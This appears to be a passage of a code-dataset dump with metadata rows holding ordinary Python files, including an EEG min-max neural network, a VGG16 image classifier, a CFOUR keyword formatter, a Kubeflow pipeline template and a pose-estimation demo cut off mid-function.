hexsha stringlengths 40 40 | size int64 7 1.04M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 247 | max_stars_repo_name stringlengths 4 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 368k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 247 | max_issues_repo_name stringlengths 4 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 247 | max_forks_repo_name stringlengths 4 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.04M | avg_line_length float64 1.77 618k | max_line_length int64 1 1.02M | alphanum_fraction float64 0 1 | original_content stringlengths 7 1.04M | filtered:remove_function_no_docstring int64 -102 942k | filtered:remove_class_no_docstring int64 -354 977k | filtered:remove_delete_markers int64 0 60.1k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d7f4ea5c8cbf03c238c6958e9cad7d14eea7464f | 9,493 | py | Python | Machine_Learning_and_Parallel_Computing/FINAL_MLP_MAXMIN/m3.py | AlexKnightDu/Lessons | 0440136051a3277deab3b9f952f8363fcae79a7f | [
"Apache-2.0"
] | 8 | 2019-03-31T05:11:31.000Z | 2021-04-07T13:15:42.000Z | Machine_Learning_and_Parallel_Computing/FINAL_MLP_MAXMIN/m3.py | AlexKnightDu/Lessons | 0440136051a3277deab3b9f952f8363fcae79a7f | [
"Apache-2.0"
] | null | null | null | Machine_Learning_and_Parallel_Computing/FINAL_MLP_MAXMIN/m3.py | AlexKnightDu/Lessons | 0440136051a3277deab3b9f952f8363fcae79a7f | [
"Apache-2.0"
] | 2 | 2021-03-27T04:14:58.000Z | 2021-04-07T13:15:53.000Z | import tensorflow as tf
import numpy as np
import scipy.io as scio
import math as ma
import multiprocessing as mp
from tensorflow.contrib import layers
import time
import os
main()
| 33.308772 | 122 | 0.577689 | import tensorflow as tf
import numpy as np
import scipy.io as scio
import math as ma
import multiprocessing as mp
from tensorflow.contrib import layers
import time
import os
def next_batch(data, label, batch_size):
index = np.arange(len(data))
np.random.shuffle(index)
index = index[0:batch_size]
batch_data = data[index]
batch_label = label[index]
return batch_data,batch_label
def onehot(labels, units):
l = len(labels)
onehot_labels = np.zeros([l,units])
for i in range(0,l):
onehot_labels[i][int(labels[i])] = 1
return onehot_labels
def normalize(data, base):
min_datum = []
max_datum = []
base = np.array(base)
for i in range(len(base[0])):
min_datum += [min(base[:,i])]
max_datum += [max(base[:,i])]
min_datum = np.array(min_datum)
max_datum = np.array(max_datum)
medium_datum = (max_datum + min_datum) * 1.0 / 2
distance = (max_datum - min_datum) * 1.0 / 2
for i in range(len(data)):
data[i] = np.array(data[i])
data[i] = ((data[i] - medium_datum) / distance)
def network(parameters):
train_data = parameters[0]
train_label = parameters[1]
test_data = parameters[2]
test_label = parameters[3]
decri = parameters[4]
descri = parameters[5]
print('the process parent id :',os.getppid())
print('the process id is :',os.getpid())
loss_out = open(descri + '_loss.txt', 'w')
acc_train_out = open(descri + '_acc_train.txt', 'w')
in_units = 310
h1_units = 40
out_units = 2
learning_rate = 0.0001
regular_ratio = 0.9
batch_num = 300
batch_size = 100
iter_num = 100
sess = tf.InteractiveSession()
W1 = tf.Variable(tf.truncated_normal([in_units, h1_units], stddev=0.1))
b1 = tf.Variable(tf.zeros([h1_units]))
W5 = tf.Variable(tf.truncated_normal([h1_units, out_units], stddev=0.1))
b5 = tf.Variable(tf.zeros([out_units]))
x = tf.placeholder(tf.float32, [None, in_units])
hidden1 = tf.nn.sigmoid(tf.matmul(x,W1) + b1)
y = tf.nn.softmax(tf.matmul(hidden1, W5) + b5)
y_ = tf.placeholder(tf.float32, [None, out_units])
regular = layers.l2_regularizer(.5)(W1) + layers.l2_regularizer(.5)(W5)
loss = -tf.reduce_sum(y_ * tf.log(y)) + regular_ratio * regular
train_step = tf.train.GradientDescentOptimizer(learning_rate).minimize(loss)
all_prediction = []
tf.global_variables_initializer().run()
begin = time.time()
for j in range(0,iter_num):
for i in range(0, batch_num):
batch_x, batch_y = next_batch(train_data, train_label, batch_size)
train_step.run({x:batch_x, y_:batch_y})
result = tf.argmax(y,1)
correct_prediction = tf.equal(tf.argmax(y,1), tf.argmax(y_,1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
total_cross_entropy = sess.run(loss, feed_dict={x:train_data, y_:train_label})
train_accur = accuracy.eval({x:train_data, y_:train_label})
print('Iter:' + str(j))
print('loss: ' + str(total_cross_entropy))
print(train_accur)
loss_out.write(str(total_cross_entropy) + '\n')
acc_train_out.write(str(train_accur) + '\n')
prediction = (sess.run(result, feed_dict = {x:test_data}))
all_prediction += [prediction]
end = time.time()
print((end - begin))
all_prediction = np.array(all_prediction)
return [decri,all_prediction]
def process_data(train_data, train_label, random):
data = [[],[],[],[]]
labels = [[],[],[],[]]
pair_data = [[],[],[],[]]
pair_labels = [[],[],[],[]]
for i in range(0,len(train_label)):
data[train_label[i][0]] += [train_data[i]]
labels[train_label[i][0]] += [1]
if (random):
for i in range(0,len(train_label)):
for j in range(0,4):
if (j != train_label[i][0]):
data[j] += [train_data[i]]
labels[j] += [0]
for i in range(0,4):
data[i] = np.array(data[i])
labels[i] = np.array(labels[i])
return data, labels
else:
for i in range(0,4):
for j in range(0,4):
if (i != j):
pair_data[i] += [np.array(data[i]+data[j])]
pair_labels[i] += [np.array(labels[i]+np.zeros(len(data[j])).tolist())]
return pair_data, pair_labels
def prior_generate_data(train_data, train_label, min_num, max_num, num):
data = []
labels = []
for i in range(0,max_num):
data += [[]]
labels += [[]]
for j in range(0,min_num):
datum, label = next_batch(train_data[j] , train_label[j], num)
data[i] += [datum]
labels[i] += [(label)]
return np.array(data), np.array(labels)
def random_generate_data(train_data, train_label, min_num, max_num, num):
data = []
labels = []
for i in range(0,max_num):
data += [[]]
labels += [[]]
for j in range(0,min_num):
datum, label = next_batch(train_data, train_label, num)
data[i] += [datum]
labels[i] += [label]
return np.array(data), np.array(labels)
def minmax(results, min_num, max_num, test_label):
min_result = []
max_result = []
for i in range(0,max_num):
min_result += [[]]
for j in range(0,len(results[0][0])):
min_result[i] += [[]]
for k in range(0,len(test_label)):
min_result[i][j] += [min(results[i][:][:,j][:,k])]
min_result = np.array(min_result)
for i in range(0,len(min_result[0])):
max_result += [[]]
for j in range(0,len(test_label)):
max_result[i] += [max(min_result[:,i][:,j])]
return max_result
def main():
min_num = 3
max_num = 4
cate_num = 4
sub_data_size = 1000
data_file = './data.mat'
data = scio.loadmat(data_file)
out_units = 4
train_data = data['train_de']
test_data = data['test_de']
normalize(train_data, test_data)
normalize(test_data, test_data)
train_label = data['train_label_eeg']
test_label = data['test_label_eeg']
ovr_random_data, ovr_random_label = process_data(train_data, train_label, True)
ovr_prior_data, ovr_prior_label = process_data(train_data, train_label, False)
for i in range(0,len(ovr_random_label)):
ovr_random_label[i] = onehot(ovr_random_label[i], 2)
for i in range(0,max_num):
for j in range(0,max_num-1):
ovr_prior_label[i][j] = onehot(ovr_prior_label[i][j],2)
train_label = np.concatenate(train_label)
test_label = np.concatenate(test_label)
train_label = onehot(data['train_label_eeg'], out_units)
test_label = onehot(data['test_label_eeg'], out_units)
results = [[],[],[],[]]
time_stamp = time.strftime("%H-%M-%S",time.localtime())
for k in range(0,cate_num):
### Based on random
M3_data, M3_label = random_generate_data(ovr_random_data[k], ovr_random_label[k], min_num, max_num, sub_data_size)
### Based on prior
#M3_data, M3_label = prior_generate_data(ovr_prior_data[k], ovr_prior_label[k], min_num, max_num, sub_data_size)
len_train_data = len(train_data)
len_test_data = len(test_data)
pool = mp.Pool()
processes = []
result = []
for i in range(0, max_num):
processes += [[]]
result += [[]]
for j in range(0, min_num):
descri = './t_' + time_stamp + '_' + str(i) + '_' + str(j)
parameters = [M3_data[i][j], M3_label[i][j], test_data, test_label, i, descri]
processes[i] += [pool.apply_async(network, args=(parameters,))]
result[i] += [[]]
pool.close()
pool.join()
for i in range(0, max_num):
for j in range(0, min_num):
temp = processes[i][j].get()
result[temp[0]][j] = temp[1]
for i in range(0,max_num):
result[i] = np.array(result[i])
result = np.array(result)
results[k] += minmax(result, min_num, max_num, test_label)
final_result = []
for w in range(0,len(results[0])):
final_result += [[]]
for u in range(0,len(test_label)):
flag = 1
for v in range(cate_num):
if results[v][w][u] == 1:
flag = 0
final_result[w] += [v]
break
if flag:
final_result[w] += [0]
print(final_result)
real = np.concatenate(data['test_label_eeg'])
prediction = final_result
pred_out = open('./p_' + time_stamp + '_predict.txt' , 'w')
acc_out = open('./p_' + time_stamp + '_acc.txt' , 'w')
for w in range(0,len(results[0])):
prediction_static = []
for i in range(4):
prediction_static += [[0,0,0,0]]
for i in range(0,len(real)):
prediction_static[real[i]][prediction[w][i]] += 1
for i in range(4):
print(prediction_static[i])
final_accuracy = 0
for i in range(4):
final_accuracy += prediction_static[i][i]
final_accuracy = (final_accuracy * 1.0) / len(test_label)
print(final_accuracy)
pred_out.write(str(prediction_static) + '\n')
acc_out.write(str(final_accuracy) + '\n')
main()
| 9,061 | 0 | 227 |
b704c27ade50c487c10e4d1d92a82ae4c3a82117 | 1,036 | py | Python | keras_vgg.py | DiNOV-Tokyo/uied-d | c15d7e003dda13c24cfd0c17b4efb058dcc3b292 | [
"Apache-2.0"
] | null | null | null | keras_vgg.py | DiNOV-Tokyo/uied-d | c15d7e003dda13c24cfd0c17b4efb058dcc3b292 | [
"Apache-2.0"
] | null | null | null | keras_vgg.py | DiNOV-Tokyo/uied-d | c15d7e003dda13c24cfd0c17b4efb058dcc3b292 | [
"Apache-2.0"
] | null | null | null | from keras.preprocessing import image
import requests
import numpy as np
from keras.applications.vgg16 import VGG16, preprocess_input, decode_predictions
model = VGG16(include_top=True, weights='imagenet', input_tensor=None, input_shape=None)
model.summary()
#画像をダンロードするための関数
if __name__ == '__main__':
#画像のダウンロード
# url = 'https://cdn.pixabay.com/photo/2016/03/05/19/02/hamburger-1238246_1280.jpg'
# file_name = 'hamburger.jpg'
file_name = 'キャプチャ.JPG'
# download_img(url, file_name)
img = image.load_img(file_name, target_size=(224, 224))
# 読み込んだPIL形式の画像をarrayに変換
ary = image.img_to_array(img)
#サンプル数の次元を1つ増やし四次元テンソルに
ary = np.expand_dims(ary, axis=0)
#上位5を出力
preds = model.predict(preprocess_input(ary))
results = decode_predictions(preds, top=5)[0]
for result in results:
print(result) | 27.263158 | 88 | 0.700772 | from keras.preprocessing import image
import requests
import numpy as np
from keras.applications.vgg16 import VGG16, preprocess_input, decode_predictions
model = VGG16(include_top=True, weights='imagenet', input_tensor=None, input_shape=None)
model.summary()
#画像をダンロードするための関数
def download_img(url, file_name):
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(file_name, 'wb') as f:
f.write(r.content)
if __name__ == '__main__':
#画像のダウンロード
# url = 'https://cdn.pixabay.com/photo/2016/03/05/19/02/hamburger-1238246_1280.jpg'
# file_name = 'hamburger.jpg'
file_name = 'キャプチャ.JPG'
# download_img(url, file_name)
img = image.load_img(file_name, target_size=(224, 224))
# 読み込んだPIL形式の画像をarrayに変換
ary = image.img_to_array(img)
#サンプル数の次元を1つ増やし四次元テンソルに
ary = np.expand_dims(ary, axis=0)
#上位5を出力
preds = model.predict(preprocess_input(ary))
results = decode_predictions(preds, top=5)[0]
for result in results:
print(result) | 152 | 0 | 22 |
49a7170160a3706f9f9ada4a2e282be0e2cf8679 | 1,995 | py | Python | qcengine/programs/cfour/keywords.py | jhrmnn/QCEngine | 141fcc7872068936d9eacb0ac546563829d4103d | [
"BSD-3-Clause"
] | null | null | null | qcengine/programs/cfour/keywords.py | jhrmnn/QCEngine | 141fcc7872068936d9eacb0ac546563829d4103d | [
"BSD-3-Clause"
] | 1 | 2021-04-09T16:17:53.000Z | 2021-04-09T16:17:53.000Z | qcengine/programs/cfour/keywords.py | jhrmnn/QCEngine | 141fcc7872068936d9eacb0ac546563829d4103d | [
"BSD-3-Clause"
] | null | null | null | from typing import Any, Dict, Tuple
from qcengine.exceptions import InputError
def format_keywords(keywords: Dict[str, Any]) -> str:
"""Form keywords deck from dictionary `keywords` where keys are CFOUR keyword ("__" separating
any nested-module keywords) strings and values are Python formatted.
"""
text = []
keywords = {k.upper(): v for k, v in keywords.items()}
for key, val in sorted(keywords.items()):
text.append("=".join(format_keyword(key, val)))
text = "\n".join(text)
text = "\n\n*CFOUR(" + text + ")\n\n"
return text
def format_keyword(keyword: str, val: Any) -> Tuple[str, str]:
"""Reformat keyword's value from Python into CFOUR-speak. Arrays are the primary target."""
keyword = keyword.upper()
# Transform booleans into integers
if val is True:
text = "1"
elif val is False:
text = "0"
# Transform list from [[3, 0, 1, 1], [2, 0, 1, 0]] --> 3-0-1-1/2-0-1-0
elif isinstance(val, list):
if type(val[0]).__name__ == "list":
if type(val[0][0]).__name__ == "list":
raise InputError("Option has level of array nesting inconsistent with CFOUR.")
else:
# option is 2D array
text = "/".join("-".join(map(str, no)) for no in val)
else:
# option is plain 1D array
if keyword in ["ESTATE_SYM", "CFOUR_ESTATE_SYM"]:
# [3, 1, 0, 2] --> 3/1/0/2
text = "/".join(map(str, val))
else:
# [3, 1, 0, 2] --> 3-1-0-2
text = "-".join(map(str, val))
# Transform the basis sets that *must* be lowercase
elif keyword in ["CFOUR_BASIS", "BASIS"] and val.upper() in [
"SVP",
"DZP",
"TZP",
"TZP2P",
"QZ2P",
"PZ3D2F",
"13S9P4D3F",
]:
text = str(val.lower())
# No Transform
else:
text = str(val).upper()
return keyword, text
| 29.776119 | 98 | 0.541353 | from typing import Any, Dict, Tuple
from qcengine.exceptions import InputError
def format_keywords(keywords: Dict[str, Any]) -> str:
"""Form keywords deck from dictionary `keywords` where keys are CFOUR keyword ("__" separating
any nested-module keywords) strings and values are Python formatted.
"""
text = []
keywords = {k.upper(): v for k, v in keywords.items()}
for key, val in sorted(keywords.items()):
text.append("=".join(format_keyword(key, val)))
text = "\n".join(text)
text = "\n\n*CFOUR(" + text + ")\n\n"
return text
def format_keyword(keyword: str, val: Any) -> Tuple[str, str]:
"""Reformat keyword's value from Python into CFOUR-speak. Arrays are the primary target."""
keyword = keyword.upper()
# Transform booleans into integers
if val is True:
text = "1"
elif val is False:
text = "0"
# Transform list from [[3, 0, 1, 1], [2, 0, 1, 0]] --> 3-0-1-1/2-0-1-0
elif isinstance(val, list):
if type(val[0]).__name__ == "list":
if type(val[0][0]).__name__ == "list":
raise InputError("Option has level of array nesting inconsistent with CFOUR.")
else:
# option is 2D array
text = "/".join("-".join(map(str, no)) for no in val)
else:
# option is plain 1D array
if keyword in ["ESTATE_SYM", "CFOUR_ESTATE_SYM"]:
# [3, 1, 0, 2] --> 3/1/0/2
text = "/".join(map(str, val))
else:
# [3, 1, 0, 2] --> 3-1-0-2
text = "-".join(map(str, val))
# Transform the basis sets that *must* be lowercase
elif keyword in ["CFOUR_BASIS", "BASIS"] and val.upper() in [
"SVP",
"DZP",
"TZP",
"TZP2P",
"QZ2P",
"PZ3D2F",
"13S9P4D3F",
]:
text = str(val.lower())
# No Transform
else:
text = str(val).upper()
return keyword, text
| 0 | 0 | 0 |
cebc3e0c1da62804ea1c732351e20ef80090b70c | 353 | py | Python | tests/audio/encode_test.py | MulberryBeacon/anarky | 54684e4422d36c6ea3c0bb3fab5af56002864690 | [
"MIT"
] | 1 | 2015-05-12T13:05:04.000Z | 2015-05-12T13:05:04.000Z | tests/audio/encode_test.py | MulberryBeacon/anarky | 54684e4422d36c6ea3c0bb3fab5af56002864690 | [
"MIT"
] | null | null | null | tests/audio/encode_test.py | MulberryBeacon/anarky | 54684e4422d36c6ea3c0bb3fab5af56002864690 | [
"MIT"
] | null | null | null | # -*- coding: utf8 -*-
"""
Tests for the encoding library.
Author: Eduardo Ferreira
License: MIT (see LICENSE for details)
"""
import unittest
class EncodeTests(unittest.TestCase):
"""
Tests for the encoding library.
"""
def test_dummy(self):
"""
Dummy test method.
"""
self.assertEqual(True, True)
| 15.347826 | 38 | 0.606232 | # -*- coding: utf8 -*-
"""
Tests for the encoding library.
Author: Eduardo Ferreira
License: MIT (see LICENSE for details)
"""
import unittest
class EncodeTests(unittest.TestCase):
"""
Tests for the encoding library.
"""
def test_dummy(self):
"""
Dummy test method.
"""
self.assertEqual(True, True)
| 0 | 0 | 0 |
f0f856c955d4d13afe98f22773552b965f9e4084 | 869 | py | Python | configcrunch/tests/acceptance/merging_easy_test.py | Parakoopa/configcrunch | 18f1a73bf62b2d15b4822072e222d2881f9ac350 | [
"MIT"
] | 1 | 2019-10-06T07:26:38.000Z | 2019-10-06T07:26:38.000Z | configcrunch/tests/acceptance/merging_easy_test.py | Parakoopa/configcrunch | 18f1a73bf62b2d15b4822072e222d2881f9ac350 | [
"MIT"
] | 1 | 2020-02-03T10:43:26.000Z | 2020-02-03T12:29:16.000Z | configcrunch/tests/acceptance/merging_easy_test.py | Parakoopa/configcrunch | 18f1a73bf62b2d15b4822072e222d2881f9ac350 | [
"MIT"
] | null | null | null | from configcrunch.tests.acceptance.testcases import ConfigcrunchTestCase
| 28.966667 | 72 | 0.654776 | from configcrunch.tests.acceptance.testcases import ConfigcrunchTestCase
class MergingEasyTest(ConfigcrunchTestCase):
@classmethod
def fixture_name(cls):
return 'merging_easy'
def test_same(self):
self.assertDocEqualMerging(
'easy_expected.yml',
'easy.yml',
[]
)
def test_different(self):
doc = self.load_base('something_else.yml', [])
expected_result = self.fix_get_yml('easy.yml')
self.assertNotEqual(expected_result, doc.to_dict())
self.assertValidDoc(doc)
def test_different_direct(self):
easy_doc = self.load_base('easy.yml', [])
other_doc = self.load_base('something_else.yml', [])
self.assertNotEqual(easy_doc.to_dict(), other_doc.to_dict())
self.assertValidDoc(easy_doc)
self.assertValidDoc(other_doc)
| 625 | 147 | 23 |
06cab0bf174065b88bc4f54fedb44b33155aff6d | 1,634 | py | Python | api/server/swagger_server/code_templates/run_component.TEMPLATE.py | krishnakumar27/mlx | dce67d58dffa24ca7a6a4d6b5fd8d4eb94e35215 | [
"Apache-2.0"
] | 98 | 2021-05-03T23:27:53.000Z | 2022-03-13T02:29:12.000Z | api/server/swagger_server/code_templates/run_component.TEMPLATE.py | krishnakumar27/mlx | dce67d58dffa24ca7a6a4d6b5fd8d4eb94e35215 | [
"Apache-2.0"
] | 296 | 2021-05-03T22:44:26.000Z | 2022-03-31T11:50:16.000Z | api/server/swagger_server/code_templates/run_component.TEMPLATE.py | krishnakumar27/mlx | dce67d58dffa24ca7a6a4d6b5fd8d4eb94e35215 | [
"Apache-2.0"
] | 38 | 2021-05-03T22:52:59.000Z | 2022-03-31T03:58:34.000Z | # Copyright 2021 The MLX Contributors
#
# SPDX-License-Identifier: Apache-2.0
from kfp import dsl
from kfp_tekton.compiler import TektonCompiler
from kfp_tekton import TektonClient
from os import path
from tempfile import gettempdir
############################################################
# Define the pipeline method
############################################################
@dsl.pipeline(
name='${name}',
description='${description}'
)
############################################################
# Compile the pipeline
############################################################
pipeline_function = kfp_component_pipeline
pipeline_filename = path.join(gettempdir(),
pipeline_function.__name__ + '.pipeline.tar.gz')
TektonCompiler().compile(pipeline_function, pipeline_filename)
############################################################
# Run the pipeline
############################################################
# TODO: specify pipeline argument values
arguments = ${parameter_dict}
client = TektonClient(${pipeline_server})
# Get or create an experiment and submit a pipeline run
experiment = client.create_experiment('COMPONENT_RUNS')
# Submit the experiment to run in a pipeline
run_name = '${run_name}'
run_result = client.run_pipeline(experiment.id, run_name, pipeline_filename, arguments)
| 29.178571 | 87 | 0.571603 | # Copyright 2021 The MLX Contributors
#
# SPDX-License-Identifier: Apache-2.0
from kfp import dsl
from kfp_tekton.compiler import TektonCompiler
from kfp_tekton import TektonClient
from os import path
from tempfile import gettempdir
############################################################
# Define the pipeline method
############################################################
@dsl.pipeline(
name='${name}',
description='${description}'
)
def kfp_component_pipeline(${pipeline_method_args}):
from kfp import components
template_url = '${component_template_url}'
comp = components.load_component_from_url(template_url)
op = comp(${parameter_names})
############################################################
# Compile the pipeline
############################################################
pipeline_function = kfp_component_pipeline
pipeline_filename = path.join(gettempdir(),
pipeline_function.__name__ + '.pipeline.tar.gz')
TektonCompiler().compile(pipeline_function, pipeline_filename)
############################################################
# Run the pipeline
############################################################
# TODO: specify pipeline argument values
arguments = ${parameter_dict}
client = TektonClient(${pipeline_server})
# Get or create an experiment and submit a pipeline run
experiment = client.create_experiment('COMPONENT_RUNS')
# Submit the experiment to run in a pipeline
run_name = '${run_name}'
run_result = client.run_pipeline(experiment.id, run_name, pipeline_filename, arguments)
| 207 | 0 | 22 |
4871f033380bcbe552045d9126e22993ef5c608c | 98 | py | Python | monobank_api/__init__.py | edicasoft/monobank-api | 111ec0d7b4c8e43e2594a554b8d7e61c0da1f4f5 | [
"MIT"
] | 3 | 2019-12-25T11:23:16.000Z | 2021-07-15T08:28:53.000Z | monobank_api/__init__.py | edicasoft/monobank-api | 111ec0d7b4c8e43e2594a554b8d7e61c0da1f4f5 | [
"MIT"
] | null | null | null | monobank_api/__init__.py | edicasoft/monobank-api | 111ec0d7b4c8e43e2594a554b8d7e61c0da1f4f5 | [
"MIT"
] | null | null | null | from .client import BaseAPI, CorporateAPI, PersonalAPI
from .errors import Error, TooManyRequests
| 32.666667 | 54 | 0.836735 | from .client import BaseAPI, CorporateAPI, PersonalAPI
from .errors import Error, TooManyRequests
| 0 | 0 | 0 |
b7ff078dd5c9962b18391c49ebf4aa707645e21e | 849 | py | Python | main.py | kseniia-grishchenko/parsing-python | b0d1dde671ab6ed012245393a782cd476d27b411 | [
"Apache-2.0"
] | null | null | null | main.py | kseniia-grishchenko/parsing-python | b0d1dde671ab6ed012245393a782cd476d27b411 | [
"Apache-2.0"
] | null | null | null | main.py | kseniia-grishchenko/parsing-python | b0d1dde671ab6ed012245393a782cd476d27b411 | [
"Apache-2.0"
] | null | null | null | from parse_one_paged import parse_one_paged
AVAILABLE_SITES = [
{
'name': 'make up',
'url': 'https://makeup.com.ua/brand/1771098/',
'product_class': '.simple-slider-list__link',
'name_class': '.simple-slider-list__name',
'price_class': '.simple-slider-list__price',
'type': 'one-paged'
}
]
headers_example = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',
}
if __name__ == "__main__":
collect_data()
| 29.275862 | 136 | 0.592462 | from parse_one_paged import parse_one_paged
AVAILABLE_SITES = [
{
'name': 'make up',
'url': 'https://makeup.com.ua/brand/1771098/',
'product_class': '.simple-slider-list__link',
'name_class': '.simple-slider-list__name',
'price_class': '.simple-slider-list__price',
'type': 'one-paged'
}
]
headers_example = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',
}
def collect_data():
for site in AVAILABLE_SITES:
if site['type'] == 'one-paged':
product_list = parse_one_paged(site['url'], site['product_class'], site['name_class'],
site['price_class'], {})
print(product_list)
if __name__ == "__main__":
collect_data()
| 270 | 0 | 23 |
7e5bfbbc8e01103fdb4513a01af0ad749b68be83 | 58 | py | Python | services/keywords/constants.py | jaimehisao/major-tom | e991616deb6fc6d86ff3752c4b2136578b3d11f3 | [
"Apache-2.0"
] | 6 | 2020-07-15T18:28:38.000Z | 2021-04-20T13:39:26.000Z | services/keywords/constants.py | jaimehisao/major-tom | e991616deb6fc6d86ff3752c4b2136578b3d11f3 | [
"Apache-2.0"
] | 61 | 2020-07-20T21:52:59.000Z | 2021-06-18T16:53:34.000Z | services/keywords/constants.py | jaimehisao/major-tom | e991616deb6fc6d86ff3752c4b2136578b3d11f3 | [
"Apache-2.0"
] | 10 | 2020-07-17T21:44:09.000Z | 2021-04-26T22:53:33.000Z | KEY_PARTS_OF_SPEECH = ["ADJ", "NOUN", "NUM", "VERB", "X"]
| 29 | 57 | 0.586207 | KEY_PARTS_OF_SPEECH = ["ADJ", "NOUN", "NUM", "VERB", "X"]
| 0 | 0 | 0 |
b56dbf0e39ffc9443c9b0eacfc47c257aab4af41 | 12,678 | py | Python | demo_data_process.py | Milton-Hu/Human-Pose-Estimation-and-Evaluation-for-Rehabilitation | d559ac1a43041e4dc6bf9452d47860c1afe0ce56 | [
"Apache-2.0"
] | null | null | null | demo_data_process.py | Milton-Hu/Human-Pose-Estimation-and-Evaluation-for-Rehabilitation | d559ac1a43041e4dc6bf9452d47860c1afe0ce56 | [
"Apache-2.0"
] | null | null | null | demo_data_process.py | Milton-Hu/Human-Pose-Estimation-and-Evaluation-for-Rehabilitation | d559ac1a43041e4dc6bf9452d47860c1afe0ce56 | [
"Apache-2.0"
] | null | null | null | # 绘图相关包
from PyQt5.Qt import *
from pyqtgraph import PlotWidget
from PyQt5 import QtCore
import numpy as np
import pyqtgraph as pq
# 绘图相关包
import cv2
import math
import torch
import pyrealsense2 as rs
#人体姿态估计相关包
from models.with_mobilenet import PoseEstimationWithMobileNet
from modules.keypoints import extract_keypoints, group_keypoints, BODY_PARTS_KPT_IDS, BODY_PARTS_PAF_IDS
from modules.load_state import load_state
from modules.pose import Pose, track_poses
from val import normalize, pad_width
KPTS_ANGLE_PAIRS = [[2,3,4], [5,6,7], [8,9,10], [14,15,16], [9,10,12], [15,16,18]]
# Q为这一轮的心里的预估误差
Q = 0.00001
# R为下一轮的测量误差
R = 0.1
# Accumulated_Error为上一轮的估计误差,具体呈现为所有误差的累计
Accumulated_Error = np.ones(6, np.float32)
# 初始旧值
kalman_kpt_old = np.zeros(6, np.float32)
SCOPE = 50
# 数据左移
if __name__ == '__main__':
import sys
# PyQt5 程序固定写法
app = QApplication(sys.argv)
# 将绑定了绘图控件的窗口实例化并展示
window = Window()
# window.show() #TODO: 这个会多出一个空白窗口,注释掉就不会出现了
# PyQt5 程序固定写法
sys.exit(app.exec()) | 44.020833 | 214 | 0.624862 | # 绘图相关包
from PyQt5.Qt import *
from pyqtgraph import PlotWidget
from PyQt5 import QtCore
import numpy as np
import pyqtgraph as pq
# 绘图相关包
import cv2
import math
import torch
import pyrealsense2 as rs
#人体姿态估计相关包
from models.with_mobilenet import PoseEstimationWithMobileNet
from modules.keypoints import extract_keypoints, group_keypoints, BODY_PARTS_KPT_IDS, BODY_PARTS_PAF_IDS
from modules.load_state import load_state
from modules.pose import Pose, track_poses
from val import normalize, pad_width
KPTS_ANGLE_PAIRS = [[2,3,4], [5,6,7], [8,9,10], [14,15,16], [9,10,12], [15,16,18]]
# Q为这一轮的心里的预估误差
Q = 0.00001
# R为下一轮的测量误差
R = 0.1
# Accumulated_Error为上一轮的估计误差,具体呈现为所有误差的累计
Accumulated_Error = np.ones(6, np.float32)
# 初始旧值
kalman_kpt_old = np.zeros(6, np.float32)
SCOPE = 50
def infer_fast(net, img, net_input_height_size, stride, upsample_ratio, cpu,
pad_value=(0, 0, 0), img_mean=np.array([128, 128, 128], np.float32), img_scale=np.float32(1/256)):
height, width, _ = img.shape
scale = net_input_height_size / height
scaled_img = cv2.resize(img, (0, 0), fx=scale, fy=scale, interpolation=cv2.INTER_LINEAR)
scaled_img = normalize(scaled_img, img_mean, img_scale)
min_dims = [net_input_height_size, max(scaled_img.shape[1], net_input_height_size)]
padded_img, pad = pad_width(scaled_img, stride, pad_value, min_dims)
tensor_img = torch.from_numpy(padded_img).permute(2, 0, 1).unsqueeze(0).float()
if not cpu:
tensor_img = tensor_img.cuda()
stages_output = net(tensor_img)
stage2_heatmaps = stages_output[-2]
heatmaps = np.transpose(stage2_heatmaps.squeeze().cpu().data.numpy(), (1, 2, 0))
heatmaps = cv2.resize(heatmaps, (0, 0), fx=upsample_ratio, fy=upsample_ratio, interpolation=cv2.INTER_CUBIC)
stage2_pafs = stages_output[-1]
pafs = np.transpose(stage2_pafs.squeeze().cpu().data.numpy(), (1, 2, 0))
pafs = cv2.resize(pafs, (0, 0), fx=upsample_ratio, fy=upsample_ratio, interpolation=cv2.INTER_CUBIC)
return heatmaps, pafs, scale, pad
def pose_estimate(net, img, depth_img, height_size, cpu, track, smooth):
net = net.eval()
if not cpu:
net = net.cuda()
stride = 8
upsample_ratio = 4
num_keypoints = Pose.num_kpts # num_kpts = 18
previous_poses = []
keypoint_angel = np.zeros(6,np.float32) # 重要关节角度值
delay = 1
camera_px = 331.232
camera_py = 252.661
camera_fx = 611.462
camera_fy = 610.139
orig_img = img.copy()
heatmaps, pafs, scale, pad = infer_fast(net, img, height_size, stride, upsample_ratio, cpu)
total_keypoints_num = 0
all_keypoints_by_type = []
for kpt_idx in range(num_keypoints): # 19th for bg
total_keypoints_num += extract_keypoints(heatmaps[:, :, kpt_idx], all_keypoints_by_type, total_keypoints_num)
pose_entries, all_keypoints = group_keypoints(all_keypoints_by_type, pafs) # pose_entries是不同人体的pose
for kpt_id in range(all_keypoints.shape[0]):
all_keypoints[kpt_id, 0] = (all_keypoints[kpt_id, 0] * stride / upsample_ratio - pad[1]) / scale
all_keypoints[kpt_id, 1] = (all_keypoints[kpt_id, 1] * stride / upsample_ratio - pad[0]) / scale
current_poses = []
for n in range(len(pose_entries)):
